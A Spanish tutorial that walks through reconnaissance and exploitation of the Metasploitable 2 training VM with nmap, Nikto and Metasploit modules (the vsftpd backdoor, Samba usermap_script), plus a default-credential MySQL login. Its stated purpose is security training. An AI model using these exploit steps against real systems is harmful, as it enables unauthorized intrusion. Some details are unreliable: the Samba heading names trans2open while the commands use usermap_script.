====== Plan de Evaluación y Explotación de Vulnerabilidades en Metasploitable 2 ====== Plan detallado para comprobar las vulnerabilidades de Metasploitable 2 usando Kali Linux. Este plan está diseñado de manera didáctica para que sea fácil de seguir y entender. Metasploitable 2 es una máquina virtual vulnerable diseñada específicamente para pruebas de seguridad y formación en ciberseguridad. ===== Paso 1: Configuración del Entorno ===== * **Descargar e instalar VirtualBox o VMware**: Si no lo tienes ya, descarga e instala VirtualBox o VMware Workstation Player. * **Descargar Metasploitable 2**: Descarga la máquina virtual de Metasploitable 2 desde el sitio oficial de Rapid7. * **Configurar la Máquina Virtual**: Importa la máquina virtual de Metasploitable 2 en VirtualBox o VMware y asegúrate de que esté en la misma red que tu máquina Kali Linux (puedes usar una red NAT o una red interna para aislamiento). * **Iniciar las máquinas virtuales**: Inicia tanto Metasploitable 2 como Kali Linux. ===== Paso 2: Reconocimiento ===== ==== Identificar la dirección IP de Metasploitable 2 ==== * En la terminal de Kali Linux, utiliza el comando ''nmap'' para identificar la dirección IP: sudo nmap -sn 192.168.0.0/24 * Encuentra la dirección IP de Metasploitable 2 en los resultados. ==== Escaneo de Puertos y Servicios ==== * Realiza un escaneo completo de puertos y servicios en la IP de Metasploitable 2: sudo nmap -A -T4 * Esto identificará los puertos abiertos y los servicios que se ejecutan en ellos. ===== Paso 3: Identificación de Vulnerabilidades ===== ==== Buscar servicios vulnerables ==== * Analiza los resultados del escaneo de Nmap para identificar servicios conocidos por ser vulnerables. Metasploitable 2 incluye servicios como FTP, SSH, Telnet, SMB, y varios otros. ==== Uso de Nikto para análisis de vulnerabilidades web ==== * Ejecuta Nikto contra la IP de Metasploitable 2 para identificar vulnerabilidades en servicios web: sudo nikto -h ===== Paso 4: Explotación de Vulnerabilidades ===== A continuación, se describen algunas vulnerabilidades comunes en Metasploitable 2 y cómo explotarlas. ==== Explotación de VSFTPD 2.3.4 ==== * **Identificación**: VSFTPD 2.3.4 es un servicio FTP que tiene una puerta trasera conocida. * **Uso de Metasploit**: sudo msfconsole * Dentro de Metasploit: use exploit/unix/ftp/vsftpd_234_backdoor set RHOST exploit * Esto debería darte una shell en Metasploitable 2. ==== Explotación de Samba (SMB) usando el exploit de trans2open ==== * **Identificación**: Samba 3.x tiene una vulnerabilidad conocida. * **Uso de Metasploit**: sudo msfconsole * Dentro de Metasploit: use exploit/multi/samba/usermap_script set RHOST exploit * Esto debería proporcionar acceso a una shell con privilegios de root. ==== Explotación de una vulnerabilidad en la base de datos MySQL ==== * **Identificación**: MySQL en Metasploitable 2 tiene credenciales por defecto (root:root). * **Explotación manual**: mysql -u root -p -h * Introduce la contraseña ''root''. * Una vez dentro de la base de datos, puedes ejecutar comandos SQL maliciosos. ===== Paso 5: Documentación y Mitigación ===== * **Documentar las vulnerabilidades encontradas**: Registra todas las vulnerabilidades identificadas, los métodos de explotación utilizados y los resultados obtenidos. * **Recomendar medidas de mitigación**: Sugiere cómo pueden solucionarse estas vulnerabilidades, como actualizar el software, cambiar credenciales por defecto, y deshabilitar servicios innecesarios. ===== Conclusión ===== Este plan proporciona una guía completa para la evaluación y explotación de vulnerabilidades en Metasploitable 2 usando Kali Linux. Cada paso incluye instrucciones detalladas y comandos específicos para facilitar el aprendizaje y la comprensión.